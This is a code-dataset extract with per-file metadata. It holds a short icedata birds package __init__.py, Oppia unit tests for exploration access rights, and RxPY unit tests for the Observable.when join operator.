b43df1d54134f3214c930f51e2e5bc4d91d09329
| 136
|
py
|
Python
|
icedata/datasets/birds/__init__.py
|
ganesh3/icedata
|
16c26ea3d8f96b99357683849d6bd363bf12a827
|
[
"Apache-2.0"
] | null | null | null |
icedata/datasets/birds/__init__.py
|
ganesh3/icedata
|
16c26ea3d8f96b99357683849d6bd363bf12a827
|
[
"Apache-2.0"
] | null | null | null |
icedata/datasets/birds/__init__.py
|
ganesh3/icedata
|
16c26ea3d8f96b99357683849d6bd363bf12a827
|
[
"Apache-2.0"
] | null | null | null |
from icedata.datasets.birds.data import *
from icedata.datasets.birds.parser import *
from icedata.datasets.birds import trained_models
| 34
| 49
| 0.838235
| 19
| 136
| 5.947368
| 0.473684
| 0.292035
| 0.504425
| 0.637168
| 0.530973
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.088235
| 136
| 3
| 50
| 45.333333
| 0.91129
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
b44f0f907af65a256bf5da5cc4aa0d903df54279
| 14,025
|
py
|
Python
|
core/domain/rights_manager_test.py
|
VictoriaRoux/oppia
|
5ae2a7f0b5c85d6e28222844d22ebdbfb81923c6
|
[
"Apache-2.0"
] | 3
|
2015-03-17T01:34:14.000Z
|
2015-04-11T10:35:53.000Z
|
core/domain/rights_manager_test.py
|
VictoriaRoux/oppia
|
5ae2a7f0b5c85d6e28222844d22ebdbfb81923c6
|
[
"Apache-2.0"
] | null | null | null |
core/domain/rights_manager_test.py
|
VictoriaRoux/oppia
|
5ae2a7f0b5c85d6e28222844d22ebdbfb81923c6
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for classes and methods relating to user rights."""
__author__ = 'Sean Lip'
from core.domain import exp_domain
from core.domain import exp_services
from core.domain import rights_manager
import test_utils
class ExplorationRightsTests(test_utils.GenericTestBase):
"""Test that rights for actions on explorations work as expected."""
def setUp(self):
super(ExplorationRightsTests, self).setUp()
self.signup('a@example.com', 'A')
self.signup('b@example.com', 'B')
self.signup('c@example.com', 'C')
self.signup('d@example.com', 'D')
self.signup('e@example.com', 'E')
self.signup(self.ADMIN_EMAIL, username=self.ADMIN_USERNAME)
self.user_id_a = self.get_user_id_from_email('a@example.com')
self.user_id_b = self.get_user_id_from_email('b@example.com')
self.user_id_c = self.get_user_id_from_email('c@example.com')
self.user_id_d = self.get_user_id_from_email('d@example.com')
self.user_id_e = self.get_user_id_from_email('e@example.com')
self.user_id_admin = self.get_user_id_from_email(self.ADMIN_EMAIL)
self.set_admins([self.ADMIN_EMAIL])
self.EXP_ID = 'exp_id'
def test_demo_exploration(self):
exp_services.load_demo('1')
self.assertTrue(rights_manager.Actor(self.user_id_a).can_play('1'))
self.assertTrue(rights_manager.Actor(self.user_id_a).can_view('1'))
self.assertTrue(rights_manager.Actor(self.user_id_a).can_edit('1'))
self.assertFalse(rights_manager.Actor(self.user_id_a).can_delete('1'))
self.assertTrue(rights_manager.Actor(self.user_id_admin).can_play('1'))
self.assertTrue(rights_manager.Actor(self.user_id_admin).can_view('1'))
self.assertTrue(rights_manager.Actor(self.user_id_admin).can_edit('1'))
self.assertTrue(
rights_manager.Actor(self.user_id_admin).can_delete('1'))
def test_non_splash_page_demo_exploration(self):
# Note: there is no difference between permissions for demo
# explorations, whether or not they are on the splash page.
exp_services.load_demo('3')
self.assertTrue(rights_manager.Actor(self.user_id_a).can_play('3'))
self.assertTrue(rights_manager.Actor(self.user_id_a).can_view('3'))
self.assertTrue(rights_manager.Actor(self.user_id_a).can_edit('3'))
self.assertFalse(rights_manager.Actor(self.user_id_a).can_delete('3'))
self.assertTrue(rights_manager.Actor(self.user_id_admin).can_play('3'))
self.assertTrue(rights_manager.Actor(self.user_id_admin).can_view('3'))
self.assertTrue(rights_manager.Actor(self.user_id_admin).can_edit('3'))
self.assertTrue(
rights_manager.Actor(self.user_id_admin).can_delete('3'))
def test_ownership(self):
exp = exp_domain.Exploration.create_default_exploration(
self.EXP_ID, 'A title', 'A category')
exp_services.save_new_exploration(self.user_id_a, exp)
rights_manager.assign_role(
self.user_id_a, self.EXP_ID, self.user_id_b,
rights_manager.ROLE_EDITOR)
self.assertTrue(
rights_manager.Actor(self.user_id_a).is_owner(self.EXP_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).is_owner(self.EXP_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_admin).is_owner(self.EXP_ID))
def test_newly_created_exploration(self):
exp = exp_domain.Exploration.create_default_exploration(
self.EXP_ID, 'A title', 'A category')
exp_services.save_new_exploration(self.user_id_a, exp)
self.assertTrue(
rights_manager.Actor(self.user_id_a).can_play(self.EXP_ID))
self.assertTrue(
rights_manager.Actor(self.user_id_a).can_view(self.EXP_ID))
self.assertTrue(
rights_manager.Actor(self.user_id_a).can_edit(self.EXP_ID))
self.assertTrue(
rights_manager.Actor(self.user_id_a).can_delete(self.EXP_ID))
self.assertTrue(
rights_manager.Actor(self.user_id_admin).can_play(self.EXP_ID))
self.assertTrue(
rights_manager.Actor(self.user_id_admin).can_view(self.EXP_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_admin).can_edit(self.EXP_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_admin).can_delete(self.EXP_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_play(self.EXP_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_view(self.EXP_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_edit(self.EXP_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_delete(self.EXP_ID))
def test_inviting_collaborator(self):
exp = exp_domain.Exploration.create_default_exploration(
self.EXP_ID, 'A title', 'A category')
exp_services.save_new_exploration(self.user_id_a, exp)
rights_manager.assign_role(
self.user_id_a, self.EXP_ID, self.user_id_b,
rights_manager.ROLE_EDITOR)
self.assertTrue(
rights_manager.Actor(self.user_id_b).can_play(self.EXP_ID))
self.assertTrue(
rights_manager.Actor(self.user_id_b).can_view(self.EXP_ID))
self.assertTrue(
rights_manager.Actor(self.user_id_b).can_edit(self.EXP_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_delete(self.EXP_ID))
def test_inviting_playtester(self):
exp = exp_domain.Exploration.create_default_exploration(
self.EXP_ID, 'A title', 'A category')
exp_services.save_new_exploration(self.user_id_a, exp)
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_play(self.EXP_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_view(self.EXP_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_edit(self.EXP_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_delete(self.EXP_ID))
rights_manager.assign_role(
self.user_id_a, self.EXP_ID, self.user_id_b,
rights_manager.ROLE_VIEWER)
self.assertTrue(
rights_manager.Actor(self.user_id_b).can_play(self.EXP_ID))
self.assertTrue(
rights_manager.Actor(self.user_id_b).can_view(self.EXP_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_edit(self.EXP_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_delete(self.EXP_ID))
def test_setting_rights(self):
exp = exp_domain.Exploration.create_default_exploration(
self.EXP_ID, 'A title', 'A category')
exp_services.save_new_exploration(self.user_id_a, exp)
rights_manager.assign_role(
self.user_id_a, self.EXP_ID, self.user_id_b,
rights_manager.ROLE_VIEWER)
with self.assertRaisesRegexp(Exception, 'Could not assign new role.'):
rights_manager.assign_role(
self.user_id_b, self.EXP_ID, self.user_id_c,
rights_manager.ROLE_VIEWER)
rights_manager.assign_role(
self.user_id_a, self.EXP_ID, self.user_id_b,
rights_manager.ROLE_EDITOR)
with self.assertRaisesRegexp(Exception, 'Could not assign new role.'):
rights_manager.assign_role(
self.user_id_b, self.EXP_ID, self.user_id_c,
rights_manager.ROLE_VIEWER)
rights_manager.assign_role(
self.user_id_a, self.EXP_ID, self.user_id_b,
rights_manager.ROLE_OWNER)
rights_manager.assign_role(
self.user_id_b, self.EXP_ID, self.user_id_c,
rights_manager.ROLE_OWNER)
rights_manager.assign_role(
self.user_id_b, self.EXP_ID, self.user_id_d,
rights_manager.ROLE_EDITOR)
rights_manager.assign_role(
self.user_id_b, self.EXP_ID, self.user_id_e,
rights_manager.ROLE_VIEWER)
def test_publishing_and_unpublishing_exploration(self):
exp = exp_domain.Exploration.create_default_exploration(
self.EXP_ID, 'A title', 'A category')
exp_services.save_new_exploration(self.user_id_a, exp)
rights_manager.publish_exploration(self.user_id_a, self.EXP_ID)
self.assertTrue(
rights_manager.Actor(self.user_id_b).can_play(self.EXP_ID))
self.assertTrue(
rights_manager.Actor(self.user_id_b).can_view(self.EXP_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_a).can_unpublish(self.EXP_ID))
rights_manager.unpublish_exploration(self.user_id_admin, self.EXP_ID)
self.assertTrue(
rights_manager.Actor(self.user_id_a).can_play(self.EXP_ID))
self.assertTrue(
rights_manager.Actor(self.user_id_a).can_view(self.EXP_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_play(self.EXP_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_view(self.EXP_ID))
def test_cannot_delete_published_exploration(self):
exp = exp_domain.Exploration.create_default_exploration(
self.EXP_ID, 'A title', 'A category')
exp_services.save_new_exploration(self.user_id_a, exp)
rights_manager.publish_exploration(self.user_id_a, self.EXP_ID)
self.assertFalse(
rights_manager.Actor(self.user_id_a).can_delete(self.EXP_ID))
def test_can_unpublish_and_delete_published_exploration(self):
exp = exp_domain.Exploration.create_default_exploration(
self.EXP_ID, 'A title', 'A category')
exp_services.save_new_exploration(self.user_id_a, exp)
rights_manager.publish_exploration(self.user_id_a, self.EXP_ID)
rights_manager.unpublish_exploration(self.user_id_admin, self.EXP_ID)
self.assertTrue(
rights_manager.Actor(self.user_id_a).can_delete(self.EXP_ID))
def test_cannot_unpublish_exploration_after_edited(self):
# User A creates an exploration, marks it private.
# User A publishes the exploration.
# User B submits a change.
# User A cannot unpublish the exploration.
pass
def test_anyone_can_submit_a_fix(self):
# User A creates an exploration, marks it private.
# User A submits a change.
# User B submits a change.
pass
def test_can_publicize_exploration(self):
exp = exp_domain.Exploration.create_default_exploration(
self.EXP_ID, 'A title', 'A category')
exp_services.save_new_exploration(self.user_id_a, exp)
rights_manager.publish_exploration(self.user_id_a, self.EXP_ID)
self.assertFalse(
rights_manager.Actor(self.user_id_a).can_publicize(self.EXP_ID))
self.assertTrue(
rights_manager.Actor(self.user_id_admin).can_publicize(
self.EXP_ID))
def test_changing_viewability(self):
exp = exp_domain.Exploration.create_default_exploration(
self.EXP_ID, 'A title', 'A category')
exp_services.save_new_exploration(self.user_id_a, exp)
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_view(self.EXP_ID))
self.assertTrue(rights_manager.Actor(
self.user_id_a).can_change_private_viewability(self.EXP_ID))
self.assertFalse(rights_manager.Actor(
self.user_id_b).can_change_private_viewability(self.EXP_ID))
self.assertTrue(rights_manager.Actor(
self.user_id_admin).can_change_private_viewability(self.EXP_ID))
with self.assertRaisesRegexp(Exception, 'already the current value'):
rights_manager.set_private_viewability(
self.user_id_a, self.EXP_ID, False)
with self.assertRaisesRegexp(Exception, 'cannot be changed'):
rights_manager.set_private_viewability(
self.user_id_b, self.EXP_ID, True)
rights_manager.set_private_viewability(
self.user_id_a, self.EXP_ID, True)
self.assertTrue(
rights_manager.Actor(self.user_id_a).can_view(self.EXP_ID))
self.assertTrue(
rights_manager.Actor(self.user_id_b).can_view(self.EXP_ID))
rights_manager.set_private_viewability(
self.user_id_a, self.EXP_ID, False)
self.assertTrue(
rights_manager.Actor(self.user_id_a).can_view(self.EXP_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_view(self.EXP_ID))
rights_manager.publish_exploration(self.user_id_a, self.EXP_ID)
self.assertFalse(rights_manager.Actor(
self.user_id_a).can_change_private_viewability(self.EXP_ID))
rights_manager.unpublish_exploration(self.user_id_admin, self.EXP_ID)
self.assertTrue(rights_manager.Actor(
self.user_id_a).can_change_private_viewability(self.EXP_ID))
self.assertFalse(rights_manager.Actor(
self.user_id_b).can_change_private_viewability(self.EXP_ID))
self.assertTrue(rights_manager.Actor(
self.user_id_admin).can_change_private_viewability(self.EXP_ID))
| 43.153846
| 79
| 0.688627
| 1,966
| 14,025
| 4.565107
| 0.093082
| 0.08156
| 0.129248
| 0.161783
| 0.820501
| 0.791755
| 0.77493
| 0.773816
| 0.768914
| 0.768134
| 0
| 0.002353
| 0.212121
| 14,025
| 324
| 80
| 43.287037
| 0.809864
| 0.075579
| 0
| 0.702479
| 0
| 0
| 0.033326
| 0
| 0
| 0
| 0
| 0
| 0.289256
| 1
| 0.061983
| false
| 0.008264
| 0.016529
| 0
| 0.082645
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b481e59c25ea90dcb3093e87c206809f79add5d8
| 20,981
|
py
|
Python
|
tests/test_observable/test_when.py
|
AlexMost/RxPY
|
05cb14c72806dc41e243789c05f498dede11cebd
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
tests/test_observable/test_when.py
|
AlexMost/RxPY
|
05cb14c72806dc41e243789c05f498dede11cebd
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
tests/test_observable/test_when.py
|
AlexMost/RxPY
|
05cb14c72806dc41e243789c05f498dede11cebd
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2021-11-04T11:13:49.000Z
|
2021-11-04T11:13:49.000Z
|
import unittest
from datetime import datetime
from rx.observable import Observable
from rx.testing import TestScheduler, ReactiveTest, is_prime
from rx.disposables import SerialDisposable
on_next = ReactiveTest.on_next
on_completed = ReactiveTest.on_completed
on_error = ReactiveTest.on_error
subscribe = ReactiveTest.subscribe
subscribed = ReactiveTest.subscribed
disposed = ReactiveTest.disposed
created = ReactiveTest.created
class RxException(Exception):
pass
# Helper function for raising exceptions within lambdas
def _raise(ex):
raise RxException(ex)
class TestWhen(unittest.TestCase):
def test_then1(self):
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(
on_next(210, 1),
on_completed(220)
)
def create():
def selector(a):
return a
return Observable.when(xs.then_do(selector))
results = scheduler.start(create)
results.messages.assert_equal(
on_next(210, 1),
on_completed(220)
)
def test_then1_error(self):
ex = Exception()
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(
on_error(210, ex)
)
def create():
def selector(a):
return a
return Observable.when(xs.then_do(selector))
results = scheduler.start(create)
results.messages.assert_equal(
on_error(210, ex)
)
def test_then1_throws(self):
ex = Exception()
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(
on_next(210, 1),
on_completed(220)
)
def create():
def selector(a):
raise ex
return Observable.when(xs.then_do(selector))
results = scheduler.start(create)
results.messages.assert_equal(
on_error(210, ex)
)
def test_and2(self):
scheduler = TestScheduler()
N = 2
obs = []
for n in range(N):
obs.append(scheduler.create_hot_observable(on_next(210, 1), on_completed(220)))
def create():
def selector(a, b):
return a + b
return Observable.when(obs[0].and_(obs[1]).then_do(selector))
results = scheduler.start(create)
results.messages.assert_equal(
on_next(210, N),
on_completed(220)
)
def test_and2_error(self):
ex = Exception()
N = 2
for n in range(N):
scheduler = TestScheduler()
obs = []
for j in range(N):
if j == n:
obs.append(scheduler.create_hot_observable(on_error(210, ex)))
else:
obs.append(scheduler.create_hot_observable(on_next(210, 1), on_completed(220)))
def create():
def selector(a, b):
return a + b
return Observable.when(obs[0].and_(obs[1]).then_do(selector))
results = scheduler.start(create)
results.messages.assert_equal(
on_error(210, ex)
)
def test_then2_throws(self):
scheduler = TestScheduler()
ex = Exception()
obs = []
N = 2
for i in range(N):
obs.append(scheduler.create_hot_observable(on_next(210, 1), on_completed(220)))
def create():
def selector(a, b):
raise ex
return Observable.when(obs[0].and_(obs[1]).then_do(selector))
results = scheduler.start(create)
results.messages.assert_equal(
on_error(210, ex)
)
def test_and3(self):
scheduler = TestScheduler()
obs = []
N = 3
for i in range(N):
obs.append(scheduler.create_hot_observable(on_next(210, 1), on_completed(220)))
def create():
def selector(a, b, c):
return a + b + c
return Observable.when(obs[0].and_(obs[1]).and_(obs[2]).then_do(selector))
results = scheduler.start(create)
results.messages.assert_equal(
on_next(210, N),
on_completed(220)
)
def test_and3_error(self):
ex = Exception()
N = 3
for i in range(N):
scheduler = TestScheduler()
obs = []
for j in range(N):
if j == i:
obs.append(scheduler.create_hot_observable(on_error(210, ex)))
else:
obs.append(scheduler.create_hot_observable(on_next(210, 1), on_completed(220)))
def create():
def selector(a, b, c):
return a + b + c
return Observable.when(obs[0].and_(obs[1]).and_(obs[2]).then_do(selector))
results = scheduler.start(create)
results.messages.assert_equal(
on_error(210, ex)
)
def test_then3_throws(self):
ex = Exception()
N = 3
scheduler = TestScheduler()
obs = []
for i in range(N):
obs.append(scheduler.create_hot_observable(on_next(210, 1), on_completed(220)))
def create():
def selector(a, b, c):
raise ex
return Observable.when(obs[0].and_(obs[1]).and_(obs[2]).then_do(selector))
results = scheduler.start(create)
results.messages.assert_equal(
on_error(210, ex)
)
def test_and4(self):
N = 4
scheduler = TestScheduler()
obs = []
for _ in range(N):
obs.append(scheduler.create_hot_observable(on_next(210, 1), on_completed(220)))
def create():
def selector(a, b, c, d):
return a + b + c + d
return Observable.when(obs[0].and_(obs[1]).and_(obs[2]).and_(obs[3]).then_do(selector))
results = scheduler.start(create)
results.messages.assert_equal(on_next(210, N), on_completed(220))
def test_and4_error(self):
ex = 'ex'
N = 4
for i in range(N):
scheduler = TestScheduler()
obs = []
for j in range(N):
if j == i:
obs.append(scheduler.create_hot_observable(on_error(210, ex)))
else:
obs.append(scheduler.create_hot_observable(on_next(210, 1), on_completed(220)))
def create():
def selector(a, b, c, d):
return a + b + c + d
return Observable.when(obs[0].and_(obs[1]).and_(obs[2]).and_(obs[3]).then_do(selector))
results = scheduler.start(create)
results.messages.assert_equal(on_error(210, ex))
def test_then4_throws(self):
ex = 'ex'
N = 4
scheduler = TestScheduler()
obs = []
for _ in range(N):
obs.append(scheduler.create_hot_observable(on_next(210, 1), on_completed(220)))
def create():
def selector(a, b, c, d):
raise Exception(ex)
return Observable.when(obs[0].and_(obs[1]).and_(obs[2]).and_(obs[3]).then_do(selector))
results = scheduler.start(create)
results.messages.assert_equal(on_error(210, ex))
def test_and5(self):
N = 5
scheduler = TestScheduler()
obs = []
for i in range(N):
obs.append(scheduler.create_hot_observable(on_next(210, 1), on_completed(220)))
def create():
def selector(a, b, c, d, e):
return a + b + c + d + e
return Observable.when(obs[0].and_(obs[1]).and_(obs[2]).and_(obs[3]).and_(obs[4]).then_do(selector))
results = scheduler.start(create)
results.messages.assert_equal(on_next(210, N), on_completed(220))
def test_and5_error(self):
ex = 'ex'
N = 5
for i in range(N):
scheduler = TestScheduler()
obs = []
for j in range(N):
if j == i:
obs.append(scheduler.create_hot_observable(on_error(210, ex)))
else:
obs.append(scheduler.create_hot_observable(on_next(210, 1), on_completed(220)))
def create():
def selector(a, b, c, d, e):
return a + b + c + d + e
return Observable.when(obs[0].and_(obs[1]).and_(obs[2]).and_(obs[3]).and_(obs[4]).then_do(selector))
results = scheduler.start(create)
results.messages.assert_equal(on_error(210, ex))
def test_then5_throws(self):
ex = 'ex'
N = 5
scheduler = TestScheduler()
obs = []
for _ in range(N):
obs.append(scheduler.create_hot_observable(on_next(210, 1), on_completed(220)))
def create():
def selector(a, b, c, d, e):
raise Exception(ex)
return Observable.when(obs[0].and_(obs[1]).and_(obs[2]).and_(obs[3]).and_(obs[4]).then_do(selector))
results = scheduler.start(create)
results.messages.assert_equal(on_error(210, ex))
def test_and6(self):
N = 6
scheduler = TestScheduler()
obs = []
for _ in range(N):
obs.append(scheduler.create_hot_observable(on_next(210, 1), on_completed(220)))
def create():
def selector(a, b, c, d, e, f):
return a + b + c + d + e + f
return Observable.when(obs[0].and_(obs[1]).and_(obs[2]).and_(obs[3]).and_(obs[4]).and_(obs[5]).then_do(selector))
results = scheduler.start(create)
results.messages.assert_equal(on_next(210, N), on_completed(220))
def test_and6_error(self):
ex = 'ex'
N = 6
for i in range(N):
scheduler = TestScheduler()
obs = []
for j in range(N):
if j == i:
obs.append(scheduler.create_hot_observable(on_error(210, ex)))
else:
obs.append(scheduler.create_hot_observable(on_next(210, 1), on_completed(220)))
def create():
def selector(a, b, c, d, e, f):
return a + b + c + d + e + f
return Observable.when(obs[0].and_(obs[1]).and_(obs[2]).and_(obs[3]).and_(obs[4]).and_(obs[5]).then_do(selector))
results = scheduler.start(create)
results.messages.assert_equal(on_error(210, ex))
def test_Then6Throws(self):
ex = 'ex'
N = 6
scheduler = TestScheduler()
obs = []
for i in range(N):
obs.append(scheduler.create_hot_observable(on_next(210, 1), on_completed(220)))
def create():
def selector(*args):
raise Exception(ex)
return Observable.when(obs[0].and_(obs[1]).and_(obs[2]).and_(obs[3]).and_(obs[4]).and_(obs[5]).then_do(selector))
results = scheduler.start(create)
results.messages.assert_equal(on_error(210, ex))
def test_and7(self):
N = 7
scheduler = TestScheduler()
obs = []
for _ in range(N):
obs.append(scheduler.create_hot_observable(on_next(210, 1), on_completed(220)))
def create():
def selector(a, b, c, d, e, f, g):
return a + b + c + d + e + f + g
return Observable.when(obs[0].and_(obs[1]).and_(obs[2]).and_(obs[3]).and_(obs[4]).and_(obs[5]).and_(obs[6]).then_do(selector))
results = scheduler.start(create)
results.messages.assert_equal(on_next(210, N), on_completed(220))
def test_and7_error(self):
ex = 'ex'
N = 7
for i in range(N):
scheduler = TestScheduler()
obs = []
for j in range(N):
if j == i:
obs.append(scheduler.create_hot_observable(on_error(210, ex)))
else:
obs.append(scheduler.create_hot_observable(on_next(210, 1), on_completed(220)))
def create():
def selector(a, b, c, d, e, f, g):
return a + b + c + d + e + f + g
return Observable.when(obs[0].and_(obs[1]).and_(obs[2]).and_(obs[3]).and_(obs[4]).and_(obs[5]).and_(obs[6]).then_do(selector))
results = scheduler.start(create)
results.messages.assert_equal(on_error(210, ex))
def test_then7_throws(self):
ex = 'ex'
N = 7
scheduler = TestScheduler()
obs = []
for _ in range(N):
obs.append(scheduler.create_hot_observable(on_next(210, 1), on_completed(220)))
def create():
def selector(*args):
raise Exception(ex)
return Observable.when(obs[0].and_(obs[1]).and_(obs[2]).and_(obs[3]).and_(obs[4]).and_(obs[5]).and_(obs[6]).then_do(selector))
results = scheduler.start(create)
results.messages.assert_equal(on_error(210, ex))
def test_and8(self):
N = 8
scheduler = TestScheduler()
obs = []
for _ in range(N):
obs.append(scheduler.create_hot_observable(on_next(210, 1), on_completed(220)))
def create():
def selector(a, b, c, d, e, f, g, h):
return a + b + c + d + e + f + g + h
return Observable.when(obs[0].and_(obs[1]).and_(obs[2]).and_(obs[3]).and_(obs[4]).and_(obs[5]).and_(obs[6]).and_(obs[7]).then_do(selector))
results = scheduler.start(create)
results.messages.assert_equal(on_next(210, N), on_completed(220))
def test_and8_error(self):
ex = 'ex'
N = 8
for i in range(N):
scheduler = TestScheduler()
obs = []
for j in range(N):
if j == i:
obs.append(scheduler.create_hot_observable(on_error(210, ex)))
else:
obs.append(scheduler.create_hot_observable(on_next(210, 1), on_completed(220)))
def create():
def selector(a, b, c, d, e, f, g, h):
return a + b + c + d + e + f + g + h
return Observable.when(obs[0].and_(obs[1]).and_(obs[2]).and_(obs[3]).and_(obs[4]).and_(obs[5]).and_(obs[6]).and_(obs[7]).then_do(selector))
results = scheduler.start(create)
results.messages.assert_equal(on_error(210, ex))
def test_then8_throws(self):
ex = 'ex'
N = 8
scheduler = TestScheduler()
obs = []
for _ in range(N):
obs.append(scheduler.create_hot_observable(on_next(210, 1), on_completed(220)))
def create():
def selector(*args):
raise Exception(ex)
return Observable.when(obs[0].and_(obs[1]).and_(obs[2]).and_(obs[3]).and_(obs[4]).and_(obs[5]).and_(obs[6]).and_(obs[7]).then_do(selector))
results = scheduler.start(create)
results.messages.assert_equal(on_error(210, ex))
def test_And9(self):
N = 9
scheduler = TestScheduler()
obs = []
for i in range(N):
obs.append(scheduler.create_hot_observable(on_next(210, 1), on_completed(220)))
def create():
def selector(a, b, c, d, e, f, g, h, _i):
return a + b + c + d + e + f + g + h + _i
return Observable.when(obs[0].and_(obs[1]).and_(obs[2]).and_(obs[3]).and_(obs[4]).and_(obs[5]).and_(obs[6]).and_(obs[7]).and_(obs[8]).then_do(selector))
results = scheduler.start(create)
results.messages.assert_equal(on_next(210, N), on_completed(220))
def test_and9_error(self):
ex = 'ex'
N = 9
for i in range(N):
scheduler = TestScheduler()
obs = []
for j in range(N):
if j == i:
obs.append(scheduler.create_hot_observable(on_error(210, ex)))
else:
obs.append(scheduler.create_hot_observable(on_next(210, 1), on_completed(220)))
def create():
def selector(a, b, c, d, e, f, g, h, _i):
return a + b + c + d + e + f + g + h + _i
return Observable.when(obs[0].and_(obs[1]).and_(obs[2]).and_(obs[3]).and_(obs[4]).and_(obs[5]).and_(obs[6]).and_(obs[7]).and_(obs[8]).then_do(selector))
results = scheduler.start(create)
results.messages.assert_equal(on_error(210, ex))
def test_then9_throws(self):
ex = 'ex'
N = 9
scheduler = TestScheduler()
obs = []
for i in range(N):
obs.append(scheduler.create_hot_observable(on_next(210, 1), on_completed(220)))
def create():
def selector(*args):
raise Exception(ex)
return Observable.when(obs[0].and_(obs[1]).and_(obs[2]).and_(obs[3]).and_(obs[4]).and_(obs[5]).and_(obs[6]).and_(obs[7]).and_(obs[8]).then_do(selector))
results = scheduler.start(create)
results.messages.assert_equal(on_error(210, ex))
def test_WhenMultipleDataSymmetric(self):
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(
on_next(210, 1),
on_next(220, 2),
on_next(230, 3),
on_completed(240)
)
ys = scheduler.create_hot_observable(
on_next(240, 4),
on_next(250, 5),
on_next(260, 6),
on_completed(270)
)
def create():
def selector(x, y):
return x + y
return Observable.when(xs.and_(ys).then_do(selector))
results = scheduler.start(create)
results.messages.assert_equal(
on_next(240, 1 + 4),
on_next(250, 2 + 5),
on_next(260, 3 + 6),
on_completed(270)
)
def test_WhenMultipleDataAsymmetric(self):
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(
on_next(210, 1),
on_next(220, 2),
on_next(230, 3),
on_completed(240)
)
ys = scheduler.create_hot_observable(
on_next(240, 4),
on_next(250, 5),
on_completed(270)
)
def create():
def selector(x, y):
return x + y
return Observable.when(xs.and_(ys).then_do(selector))
results = scheduler.start(create)
results.messages.assert_equal(
on_next(240, 1 + 4),
on_next(250, 2 + 5),
on_completed(270)
)
def test_when_empty_empty(self):
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_completed(240))
ys = scheduler.create_hot_observable(on_completed(270))
def create():
def selector(x, y):
return x + y
return Observable.when(xs.and_(ys).then_do(selector))
results = scheduler.start(create)
results.messages.assert_equal(on_completed(270))
def test_when_never_never(self):
scheduler = TestScheduler()
xs = Observable.never()
ys = Observable.never()
def create():
def selector(x, y):
return x + y
return Observable.when(xs.and_(ys).then_do(selector))
results = scheduler.start(create)
results.messages.assert_equal()
def test_when_throw_non_empty(self):
ex = 'ex'
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_error(240, ex))
ys = scheduler.create_hot_observable(on_completed(270))
def create():
def selector(x, y):
return x + y
return Observable.when(xs.and_(ys).then_do(selector))
results = scheduler.start(create)
results.messages.assert_equal(on_error(240, ex))
def test_complicated_when(self):
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_completed(240))
ys = scheduler.create_hot_observable(on_next(240, 4), on_next(250, 5), on_next(260, 6), on_completed(270))
zs = scheduler.create_hot_observable(on_next(220, 7), on_next(230, 8), on_next(240, 9), on_completed(300))
def create():
def sel1(x, y):
return x + y
def sel2(x, z):
return x * z
def sel3(y, z):
return y - z
return Observable.when(xs.and_(ys).then_do(sel1), xs.and_(zs).then_do(sel2), ys.and_(zs).then_do(sel3))
results = scheduler.start(create)
results.messages.assert_equal(on_next(220, 1 * 7), on_next(230, 2 * 8), on_next(240, 3 + 4), on_next(250, 5 - 9), on_completed(300))
if __name__ == '__main__':
unittest.main()
| 32.528682
| 168
| 0.54454
| 2,674
| 20,981
| 4.084144
| 0.046746
| 0.059335
| 0.075817
| 0.117938
| 0.892775
| 0.866404
| 0.858346
| 0.85798
| 0.852761
| 0.840491
| 0
| 0.048152
| 0.326915
| 20,981
| 644
| 169
| 32.579193
| 0.725181
| 0.002526
| 0
| 0.822485
| 0
| 0
| 0.001625
| 0
| 0
| 0
| 0
| 0
| 0.065089
| 1
| 0.201183
| false
| 0.001972
